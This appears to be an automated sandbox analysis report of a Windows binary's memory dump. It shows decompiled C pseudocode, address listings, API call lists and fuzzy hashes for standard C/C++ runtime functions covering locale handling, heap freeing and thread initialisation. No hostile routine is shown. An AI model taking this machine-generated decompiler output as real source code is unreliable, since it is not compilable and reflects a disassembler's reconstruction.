														if(_t226 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x2c)))) <= 0) {
															_t153 =  *((intOrPtr*)( *_t207 + 0x18))();
														} else {
															_t153 =  *_t226 & 0x000000ff;
														}
														if(_t153 == 0xffffffff) {
															goto L92;
														} else {
															_t193[1] = _t153;
														}
													}
													_t193[1] = 1;
												}
												_t206 =  *_t235;
												if(_t206 != 0) {
													if( *_t193 != 0) {
														goto L96;
													} else {
														goto L100;
													}
												} else {
													if( *_t193 != _t206) {
														L100:
														_v84 = _v84 + 1;
														if(_t206 == 0) {
															L107:
															 *_t235 = 0;
															_t202 = _t206 | 0xffffffff;
															_t235[1] = 1;
															continue;
														} else {
															if( *( *(_t206 + 0x1c)) == 0) {
																L104:
																_t147 = ( *_t206)[0x1c]();
															} else {
																_t224 =  *((intOrPtr*)(_t206 + 0x2c));
																_t148 =  *_t224;
																if(_t148 <= 0) {
																	goto L104;
																} else {
																	 *_t224 = _t148 - 1;
																	_t206 =  *(_t206 + 0x1c);
																	_t225 =  *_t206;
																	 *_t206 =  &(_t225[1]);
																	_t147 =  *_t225 & 0x000000ff;
																}
															}
															if(_t147 == 0xffffffff) {
																goto L107;
															} else {
																_t235[1] = 0;
																_t202 = _t206 | 0xffffffff;
																continue;
															}
														}
														goto L109;
													} else {
														L96:
														_t202 = _v88;
													}
												}
											}
											break;
										}
										if(_v48 < 0x10) {
											return _t202;
										} else {
											L0030DF6A(_v68);
											return _v88;
										}
									} else {
										_t236 = _v8;
										 *0x333a50 = _t236;
										 *((intOrPtr*)( *_t236 + 4))();
										E00308645(_t236);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t191;
								}
							} else {
								_t236 =  *((intOrPtr*)( *((intOrPtr*)(_t184 + 8)) + _t234 * 4));
								goto L11;
							}
						}
					}
				}
				L109:
			}


































































                                            0x00307b8e
                                            0x00307b93
                                            0x00307b99
                                            0x00307b9f
                                            0x00307ba4
                                            0x00307baa
                                            0x00307baf
                                            0x00307bb5
                                            0x00307bb7
                                            0x00307bbc
                                            0x00307bbd
                                            0x00307bc2
                                            0x00307bc2
                                            0x00307bca
                                            0x00307bcf
                                            0x00307bcf
                                            0x00307bd8
                                            0x00307bdd
                                            0x00307beb
                                            0x00000000
                                            0x00307bdf
                                            0x00307be2
                                            0x00307be7
                                            0x00307c4b
                                            0x00307c4e
                                            0x00307c5b
                                            0x00307be9
                                            0x00307bed
                                            0x00307bf1
                                            0x00307c03
                                            0x00307c05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307bf3
                                            0x00307bf3
                                            0x00307bfb
                                            0x00307c07
                                            0x00307c09
                                            0x00307c30
                                            0x00307c64
                                            0x00307c72
                                            0x00307c77
                                            0x00307c78
                                            0x00307c79
                                            0x00307c7a
                                            0x00307c7b
                                            0x00307c7c
                                            0x00307c7d
                                            0x00307c7e
                                            0x00307c7f
                                            0x00307c86
                                            0x00307c8c
                                            0x00307c8e
                                            0x00307c8f
                                            0x00307c92
                                            0x00307c93
                                            0x00307c96
                                            0x00307c98
                                            0x00307ca0
                                            0x00307ca2
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca5
                                            0x00307ca8
                                            0x00307ca9
                                            0x00307ca0
                                            0x00307cb4
                                            0x00307cb8
                                            0x00307cc0
                                            0x00307cc8
                                            0x00307ccd
                                            0x00307cd2
                                            0x00307cd5
                                            0x00307cda
                                            0x00307cdd
                                            0x00307ce5
                                            0x00307ce5
                                            0x00307ce7
                                            0x00307ceb
                                            0x00307ced
                                            0x00307cf2
                                            0x00307cfa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d00
                                            0x00307d00
                                            0x00307d00
                                            0x00307d03
                                            0x00307d08
                                            0x00307d0a
                                            0x00307d0c
                                            0x00307d10
                                            0x00307d14
                                            0x00307d18
                                            0x00307d1b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d1b
                                            0x00307d1d
                                            0x00307d20
                                            0x00307d20
                                            0x00307d2c
                                            0x00307d35
                                            0x00307d54
                                            0x00307d58
                                            0x00307d5b
                                            0x00307d5f
                                            0x00307d63
                                            0x00307e8f
                                            0x00307e9b
                                            0x00307e9e
                                            0x00307ea2
                                            0x00307ea5
                                            0x00307ea7
                                            0x00307ea9
                                            0x00000000
                                            0x00307d71
                                            0x00307d75
                                            0x00307d77
                                            0x00307d7b
                                            0x00307da2
                                            0x00307da2
                                            0x00307d7d
                                            0x00307d80
                                            0x00307d84
                                            0x00307d95
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d9b
                                            0x00000000
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9b
                                            0x00307da8
                                            0x00307da8
                                            0x00307db0
                                            0x00307db2
                                            0x00307db6
                                            0x00307ddd
                                            0x00307ddd
                                            0x00307db8
                                            0x00307dbb
                                            0x00307dbf
                                            0x00307dd0
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dd6
                                            0x00000000
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd6
                                            0x00307de3
                                            0x00307de3
                                            0x00307de7
                                            0x00307deb
                                            0x00307e27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307ded
                                            0x00307def
                                            0x00307e29
                                            0x00307e2d
                                            0x00307e31
                                            0x00307e58
                                            0x00307e58
                                            0x00307e33
                                            0x00307e36
                                            0x00307e3a
                                            0x00307e4b
                                            0x00307e44
                                            0x00307e44
                                            0x00307e44
                                            0x00307e51
                                            0x00000000
                                            0x00307e53
                                            0x00307e53
                                            0x00307e53
                                            0x00307e51
                                            0x00307e5e
                                            0x00307e5e
                                            0x00307e6b
                                            0x00000000
                                            0x00307e6d
                                            0x00307e6d
                                            0x00307e71
                                            0x00307e73
                                            0x00307e77
                                            0x00307e77
                                            0x00307df1
                                            0x00307df1
                                            0x00307e03
                                            0x00307e0f
                                            0x00307e12
                                            0x00307e16
                                            0x00307e19
                                            0x00307e1b
                                            0x00000000
                                            0x00307e1b
                                            0x00307def
                                            0x00307deb
                                            0x00307d37
                                            0x00307d40
                                            0x00307d44
                                            0x00307d4d
                                            0x00307ead
                                            0x00307ead
                                            0x00307ead
                                            0x00307eb1
                                            0x00307eb2
                                            0x00307eb6
                                            0x00307ec2
                                            0x00307ecc
                                            0x00307ece
                                            0x00307ed2
                                            0x00307ef9
                                            0x00307ef9
                                            0x00307ed4
                                            0x00307ed7
                                            0x00307edb
                                            0x00307eec
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ef2
                                            0x00000000
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef2
                                            0x00307eff
                                            0x00307eff
                                            0x00307f07
                                            0x00307f09
                                            0x00307f0d
                                            0x00307f34
                                            0x00307f34
                                            0x00307f0f
                                            0x00307f12
                                            0x00307f16
                                            0x00307f27
                                            0x00307f20
                                            0x00307f20
                                            0x00307f20
                                            0x00307f2d
                                            0x00000000
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2d
                                            0x00307f3a
                                            0x00307f3a
                                            0x00307f3e
                                            0x00307f42
                                            0x00307f6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307f44
                                            0x00307f46
                                            0x00307f6f
                                            0x00307f6f
                                            0x00307f75
                                            0x00307fb0
                                            0x00307fb0
                                            0x00307fb6
                                            0x00307fb9
                                            0x00000000
                                            0x00307f77
                                            0x00307f7d
                                            0x00307f9a
                                            0x00307f9c
                                            0x00307f7f
                                            0x00307f7f
                                            0x00307f82
                                            0x00307f86
                                            0x00000000
                                            0x00307f88
                                            0x00307f89
                                            0x00307f8b
                                            0x00307f8e
                                            0x00307f93
                                            0x00307f95
                                            0x00307f95
                                            0x00307f86
                                            0x00307fa2
                                            0x00000000
                                            0x00307fa4
                                            0x00307fa4
                                            0x00307fa8
                                            0x00000000
                                            0x00307fa8
                                            0x00307fa2
                                            0x00000000
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f46
                                            0x00307f42
                                            0x00000000
                                            0x00307ec2
                                            0x00307f51
                                            0x00307fca
                                            0x00307f53
                                            0x00307f57
                                            0x00307f69
                                            0x00307f69
                                            0x00307c32
                                            0x00307c32
                                            0x00307c37
                                            0x00307c3f
                                            0x00307c43
                                            0x00000000
                                            0x00307c48
                                            0x00307c0b
                                            0x00307c10
                                            0x00307c1d
                                            0x00307c1d
                                            0x00307bfd
                                            0x00307c00
                                            0x00000000
                                            0x00307c00
                                            0x00307bfb
                                            0x00307bf1
                                            0x00307be7
                                            0x00000000

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307B8E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307BAA
                                            • std::_Facet_Register.LIBCPMT ref: 00307C43
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307C64
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307C72
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: bad cast
                                            • API String ID: 3247575091-3145022300
                                            • Opcode ID: dbdcc9edff801457575daf980980aa2631856226f5c08f84156872062095a57e
                                            • Instruction ID: 52e225ae46bb8f79a934c3fa06ddc81ac3b027412e50494cf5bc7d2a59deba36
                                            • Opcode Fuzzy Hash: dbdcc9edff801457575daf980980aa2631856226f5c08f84156872062095a57e
                                            • Instruction Fuzzy Hash: 5231D731E062189BCB17DF98D8A1A9DB7B8EF54310F1141A9E8469B6D2DB31BE41CBC0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00301250, Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00301250(signed int* __ecx, void* __esi) {
				signed int _t20;
				signed int* _t32;
				signed int* _t36;
				void* _t38;
				void* _t39;

				_t36 = __ecx;
				E00308793(__ecx);
				_t14 = _t36[0xb];
				_t39 = _t38 + 4;
				if(_t36[0xb] != 0) {
					E0030DCB0(_t14);
					_t39 = _t39 + 4;
				}
				_t36[0xb] = 0;
				_t15 = _t36[9];
				if(_t36[9] != 0) {
					E0030DCB0(_t15);
					_t39 = _t39 + 4;
				}
				_t36[9] = 0;
				_t16 = _t36[7];
				if(_t36[7] != 0) {
					E0030DCB0(_t16);
					_t39 = _t39 + 4;
				}
				_t36[7] = 0;
				_t17 = _t36[5];
				if(_t36[5] != 0) {
					E0030DCB0(_t17);
					_t39 = _t39 + 4;
				}
				_t36[5] = 0;
				_t18 = _t36[3];
				if(_t36[3] != 0) {
					E0030DCB0(_t18);
					_t39 = _t39 + 4;
				}
				_t36[3] = 0;
				_t19 = _t36[1];
				if(_t36[1] != 0) {
					E0030DCB0(_t19);
				}
				_t36[1] = 0;
				_t32 = _t36;
				_t20 =  *_t32;
				if(_t20 != 0) {
					if(_t20 < 4) {
						return E0030A980(0x331ae8 + _t20 * 0x18, 0x331ae8 + _t20 * 0x18);
					}
					return _t20;
				} else {
					return E00310BAA(0xc);
				}
			}








                                            0x00301251
                                            0x00301254
                                            0x00301259
                                            0x0030125c
                                            0x00301261
                                            0x00301264
                                            0x00301269
                                            0x00301269
                                            0x0030126c
                                            0x00301273
                                            0x00301278
                                            0x0030127b
                                            0x00301280
                                            0x00301280
                                            0x00301283
                                            0x0030128a
                                            0x0030128f
                                            0x00301292
                                            0x00301297
                                            0x00301297
                                            0x0030129a
                                            0x003012a1
                                            0x003012a6
                                            0x003012a9
                                            0x003012ae
                                            0x003012ae
                                            0x003012b1
                                            0x003012b8
                                            0x003012bd
                                            0x003012c0
                                            0x003012c5
                                            0x003012c5
                                            0x003012c8
                                            0x003012cf
                                            0x003012d4
                                            0x003012d7
                                            0x003012dc
                                            0x003012df
                                            0x003012e6
                                            0x00309a52
                                            0x00309a56
                                            0x00309a64
                                            0x00000000
                                            0x00309a74
                                            0x00309a75
                                            0x00309a58
                                            0x00309a60
                                            0x00309a60

                                            APIs
                                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00301254
                                              • Part of subcall function 00308793: _setlocale.LIBCMT ref: 003087AC
                                            • _free.LIBCMT ref: 00301264
                                              • Part of subcall function 0030DCB0: HeapFree.KERNEL32(00000000,00000000,?,00315EF9,00000000,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030DCC4
                                              • Part of subcall function 0030DCB0: GetLastError.KERNEL32(00000000,?,00315EF9,00000000,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030DCD6
                                            • _free.LIBCMT ref: 0030127B
                                            • _free.LIBCMT ref: 00301292
                                            • _free.LIBCMT ref: 003012A9
                                            • _free.LIBCMT ref: 003012C0
                                            • _free.LIBCMT ref: 003012D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                            • String ID:
                                            • API String ID: 3515823920-0
                                            • Opcode ID: d484f50abc1ca39ea4ac9698ec28f268951ac31c67e0882bfdf98ccc0c8ab19b
                                            • Instruction ID: 990b6530b4b70f4f535730810bcbf52e9d6dbd34980d4034fa0c9b1d576775fb
                                            • Opcode Fuzzy Hash: d484f50abc1ca39ea4ac9698ec28f268951ac31c67e0882bfdf98ccc0c8ab19b
                                            • Instruction Fuzzy Hash: 9901EDF4A427004BEB21EF65E829B1772EC5F10714F044928E84ACB6C2F6B5E918CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00315FBD, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E00315FBD(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E0030E1CF(_t3);
				if(E00310B71() != 0) {
					_t6 = E0031216C(E00315D4C);
					 *0x32e8c4 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00311C7D(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00316033();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E003121C8( *0x32e8c4, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00315F08(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00316033();
					return 0;
				}
			}








                                            0x00315fbd
                                            0x00315fc9
                                            0x00315fd8
                                            0x00315fdd
                                            0x00315fe3
                                            0x00315fe6
                                            0x00000000
                                            0x00315fe8
                                            0x00315ff5
                                            0x00315ff9
                                            0x00315ffb
                                            0x0031602a
                                            0x0031602a
                                            0x0031602f
                                            0x00316032
                                            0x00315ffd
                                            0x0031600b
                                            0x0031600d
                                            0x00000000
                                            0x0031600f
                                            0x0031600f
                                            0x00316011
                                            0x00316012
                                            0x00316019
                                            0x0031601f
                                            0x00316023
                                            0x00316027
                                            0x00316029
                                            0x00316029
                                            0x0031600d
                                            0x00315ffb
                                            0x00315fcb
                                            0x00315fcb
                                            0x00315fcb
                                            0x00315fd2
                                            0x00315fd2

                                            APIs
                                              • Part of subcall function 0030E1CF: RtlEncodePointer.NTDLL(00000000,?,00315FC2,0030E47F,0032CCA8,00000014,00000051,0032CB98,00000050,00000001), ref: 0030E1D2
                                              • Part of subcall function 0030E1CF: __initp_misc_winsig.LIBCMT ref: 0030E1ED
                                              • Part of subcall function 0030E1CF: GetModuleHandleW.KERNEL32(kernel32.dll,00000050), ref: 00312282
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00312296
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003122A9
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003122BC
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003122CF
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003122E2
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003122F5
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00312308
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0031231B
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0031232E
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00312341
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00312354
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00312367
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0031237A
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0031238D
                                              • Part of subcall function 0030E1CF: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003123A0
                                            • __mtinitlocks.LIBCMT ref: 00315FC2
                                            • __mtterm.LIBCMT ref: 00315FCB
                                            • __calloc_crt.LIBCMT ref: 00315FF0
                                            • __initptd.LIBCMT ref: 00316012
                                            • GetCurrentThreadId.KERNEL32 ref: 00316019
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                            • String ID:
                                            • API String ID: 2364961035-0
                                            • Opcode ID: c6949f0eae8b231a4e1e409772cc2f82b7d7201b879ed12782b7206fda2b8805
                                            • Instruction ID: 45d5fd4af11330eb75c3cf3a9784647a78441553e0199bade6c73a5916b79163
                                            • Opcode Fuzzy Hash: c6949f0eae8b231a4e1e409772cc2f82b7d7201b879ed12782b7206fda2b8805
                                            • Instruction Fuzzy Hash: A3F0CD3214DB2199E23F77B47C036CA2AC89F4DB71F210A29F4A1D81D1EE6084C20190
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00309A84, Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 57%
                                            			E00309A84(void* __edx, void* __edi, intOrPtr* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				void* _t20;
				void* _t22;
				void* _t24;
				void* _t26;
				intOrPtr* _t27;
				void* _t30;

				_t25 = __edi;
				_t24 = __edx;
				_t11 = E0030E586(__edi, _t26, _t30);
				_t27 = _a4;
				 *_t27 = _t11;
				_t12 = E00311C7D(0x100, 2);
				 *((intOrPtr*)(_t27 + 4)) = _t12;
				_pop(_t22);
				_t31 = _t12;
				if(_t12 == 0) {
					_t13 = E00311999(_t20, _t24, _t27, __eflags);
					_t5 = _t27 + 8;
					 *_t5 =  *(_t27 + 8) & 0x00000000;
					__eflags =  *_t5;
					 *((intOrPtr*)(_t27 + 4)) = _t13;
				} else {
					E0030EE10( *((intOrPtr*)(_t27 + 4)), E00311999(_t20, _t24, _t27, _t31), 0x200);
					 *(_t27 + 8) = 1;
				}
				_t15 =  *((intOrPtr*)(E0030E5AC(_t25, _t27, _t31) + 4));
				 *((intOrPtr*)(_t27 + 0xc)) = _t15;
				if(_t15 != 0) {
					_push(_t15);
					 *((intOrPtr*)(_t27 + 0xc)) = E003119C2(_t22, _t24);
				}
				return _t27;
			}















                                            0x00309a84
                                            0x00309a84
                                            0x00309a88
                                            0x00309a8d
                                            0x00309a97
                                            0x00309a99
                                            0x00309a9e
                                            0x00309aa2
                                            0x00309aa3
                                            0x00309aa5
                                            0x00309ac6
                                            0x00309acb
                                            0x00309acb
                                            0x00309acb
                                            0x00309acf
                                            0x00309aa7
                                            0x00309ab5
                                            0x00309abd
                                            0x00309abd
                                            0x00309ad7
                                            0x00309ada
                                            0x00309adf
                                            0x00309ae1
                                            0x00309ae8
                                            0x00309ae8
                                            0x00309aef

                                            APIs
                                            • ____lc_codepage_func.LIBCMT ref: 00309A88
                                            • __calloc_crt.LIBCMT ref: 00309A99
                                              • Part of subcall function 00311C7D: __calloc_impl.LIBCMT ref: 00311C8C
                                            • ___pctype_func.LIBCMT ref: 00309AAC
                                            • _memmove.LIBCMT ref: 00309AB5
                                            • ___pctype_func.LIBCMT ref: 00309AC6
                                            • ____lc_locale_name_func.LIBCMT ref: 00309AD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                            • String ID:
                                            • API String ID: 1321936363-0
                                            • Opcode ID: 85ead9b2c1753dc2829ddbb7895ea7922a1a5c43861ad33f92507f41e68818b1
                                            • Instruction ID: 5853648ee34077e920e026fbbc4a5f97d22b1599905ac8e9fdfdc66ee7a67aa8
                                            • Opcode Fuzzy Hash: 85ead9b2c1753dc2829ddbb7895ea7922a1a5c43861ad33f92507f41e68818b1
                                            • Instruction Fuzzy Hash: 1CF096B1A057055FD722AF65D826B96B7D89F04750F00CC2EF5699F5C2EB74E4808B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003011C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E003011C0(void* __ecx, void* __esi, char* _a4) {
				char _v16;
				char* _t33;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				void* _t58;
				signed int* _t60;
				signed int* _t61;
				void* _t64;
				void* _t66;
				signed int* _t67;
				void* _t73;
				void* _t74;
				void* _t75;

				_t74 = _t73 - 0xc;
				_t66 = __ecx;
				E003099F7(__ecx, 0);
				 *(__ecx + 4) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *(__ecx + 0xc) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *(__ecx + 0x14) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t33 = _a4;
				_t79 = _t33;
				if(_t33 == 0) {
					_a4 = "bad locale name";
					_t60 =  &_v16;
					E0030D337(_t60,  &_a4);
					_v16 = 0x326018;
					E0030F4FA( &_v16, 0x32d2bc);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t66);
					_t67 = _t60;
					E00308793(_t67);
					_t39 = _t67[0xb];
					_t75 = _t74 + 4;
					__eflags = _t39;
					if(_t39 != 0) {
						E0030DCB0(_t39);
						_t75 = _t75 + 4;
					}
					_t67[0xb] = 0;
					_t40 = _t67[9];
					__eflags = _t40;
					if(_t40 != 0) {
						E0030DCB0(_t40);
						_t75 = _t75 + 4;
					}
					_t67[9] = 0;
					_t41 = _t67[7];
					__eflags = _t41;
					if(_t41 != 0) {
						E0030DCB0(_t41);
						_t75 = _t75 + 4;
					}
					_t67[7] = 0;
					_t42 = _t67[5];
					__eflags = _t42;
					if(_t42 != 0) {
						E0030DCB0(_t42);
						_t75 = _t75 + 4;
					}
					_t67[5] = 0;
					_t43 = _t67[3];
					__eflags = _t43;
					if(_t43 != 0) {
						E0030DCB0(_t43);
						_t75 = _t75 + 4;
					}
					_t67[3] = 0;
					_t44 = _t67[1];
					__eflags = _t44;
					if(_t44 != 0) {
						E0030DCB0(_t44);
					}
					_t67[1] = 0;
					_t61 = _t67;
					_t45 =  *_t61;
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags = _t45 - 4;
						if(_t45 < 4) {
							_t47 = 0x331ae8 + _t45 * 0x18;
							__eflags = 0x331ae8 + _t45 * 0x18;
							return E0030A980(0x331ae8 + _t45 * 0x18, _t47);
						}
						return _t45;
					} else {
						return E00310BAA(0xc);
					}
				} else {
					E00308748(_t58, _t64, __ecx, _t79, __ecx, _t33);
					return _t66;
				}
			}





















                                            0x003011c3
                                            0x003011c9
                                            0x003011cb
                                            0x003011d0
                                            0x003011d9
                                            0x003011dd
                                            0x003011e4
                                            0x003011e8
                                            0x003011ec
                                            0x003011f3
                                            0x003011f6
                                            0x003011fa
                                            0x003011fd
                                            0x00301200
                                            0x00301203
                                            0x00301206
                                            0x00301209
                                            0x0030120b
                                            0x00301223
                                            0x0030122b
                                            0x0030122e
                                            0x0030123b
                                            0x00301243
                                            0x00301248
                                            0x00301249
                                            0x0030124a
                                            0x0030124b
                                            0x0030124c
                                            0x0030124d
                                            0x0030124e
                                            0x0030124f
                                            0x00301250
                                            0x00301251
                                            0x00301254
                                            0x00301259
                                            0x0030125c
                                            0x0030125f
                                            0x00301261
                                            0x00301264
                                            0x00301269
                                            0x00301269
                                            0x0030126c
                                            0x00301273
                                            0x00301276
                                            0x00301278
                                            0x0030127b
                                            0x00301280
                                            0x00301280
                                            0x00301283
                                            0x0030128a
                                            0x0030128d
                                            0x0030128f
                                            0x00301292
                                            0x00301297
                                            0x00301297
                                            0x0030129a
                                            0x003012a1
                                            0x003012a4
                                            0x003012a6
                                            0x003012a9
                                            0x003012ae
                                            0x003012ae
                                            0x003012b1
                                            0x003012b8
                                            0x003012bb
                                            0x003012bd
                                            0x003012c0
                                            0x003012c5
                                            0x003012c5
                                            0x003012c8
                                            0x003012cf
                                            0x003012d2
                                            0x003012d4
                                            0x003012d7
                                            0x003012dc
                                            0x003012df
                                            0x003012e6
                                            0x00309a52
                                            0x00309a54
                                            0x00309a56
                                            0x00309a61
                                            0x00309a64
                                            0x00309a69
                                            0x00309a69
                                            0x00000000
                                            0x00309a74
                                            0x00309a75
                                            0x00309a58
                                            0x00309a60
                                            0x00309a60
                                            0x0030120d
                                            0x0030120f
                                            0x0030121d
                                            0x0030121d

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003011CB
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
